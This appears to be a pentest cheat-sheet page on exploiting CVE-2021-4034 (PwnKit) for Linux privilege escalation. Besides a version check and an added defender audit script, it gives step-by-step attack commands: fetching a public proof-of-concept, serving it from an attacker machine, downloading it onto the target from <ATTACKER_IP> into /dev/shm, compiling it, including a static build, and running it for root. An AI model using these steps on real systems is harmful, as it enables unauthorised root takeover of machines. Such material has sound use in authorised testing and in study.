PRIMARY CATEGORY → LINUX PRIVESC

CVE-2021-4034

Pwnkit

Affected Versions → 0.105 and lower

Enumeration
pkexec --version
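
A defender-side version of this enumeration step, as an added example that is not part of the original page: it parses `pkexec --version` output, compares it field by field against the page's 0.105 threshold, and checks whether the binary still carries the setuid bit. The function names and status labels are hypothetical and GNU `stat` is assumed; distributions backport fixes without changing the upstream version, so a `review` result means checking the vendor advisory, not confirmed exposure.

```sh
#!/bin/sh
# Added example (not from the original page). Names are hypothetical.
THRESHOLD="0.105"   # "0.105 and lower", as stated on this page

# Extract the version from output such as "pkexec version 0.105".
parse_version() {
    printf '%s\n' "$1" | sed -n 's/^pkexec version \([0-9][0-9.]*\).*$/\1/p'
}

# Succeed when $1 <= $2, comparing dotted fields numerically (0.96 < 0.105).
version_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 0
    }'
}

# Succeed when an octal mode such as 4755 has the setuid bit set.
has_setuid() {
    case "$1" in
        [4567][0-7][0-7][0-7]) return 0 ;;
        *) return 1 ;;
    esac
}

# Classify a version line and a file mode.
# Prints: unknown | above-threshold | no-setuid | review
classify() {
    ver=$(parse_version "$1")
    [ -n "$ver" ] || { echo unknown; return; }
    version_le "$ver" "$THRESHOLD" || { echo above-threshold; return; }
    has_setuid "$2" || { echo no-setuid; return; }
    echo review
}

# Audit the local host (assumes GNU stat).
audit_host() {
    bin=$(command -v pkexec) || { echo "pkexec not installed"; return 0; }
    mode=$(stat -c '%a' "$bin" 2>/dev/null) || mode=""
    echo "$bin: $(classify "$("$bin" --version 2>/dev/null)" "$mode")"
}

audit_host
```
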
Abuse

GitHub PoC

Setup
  • Downloading the exploit

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/arthepsy/CVE-2021-4034/raw/refs/heads/main/cve-2021-4034-poc.c' --output exploit.c
  • Transferring the file

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/exploit.c' --remote-name
  • Compiling the binary
gcc -o exploit ./exploit.c
chmod 700 ./exploit

If the target does not have the gcc utility available, compile a static binary on the attacker machine instead. Static linking ensures maximum portability.

To do so, clone the GitHub repository and run the following command to generate the static binary.

From the attacker ⚔️

gcc -static -o exploit ./exploit.c

Then, all that remains is to transfer the binary to the target and run it.

Usage
./exploit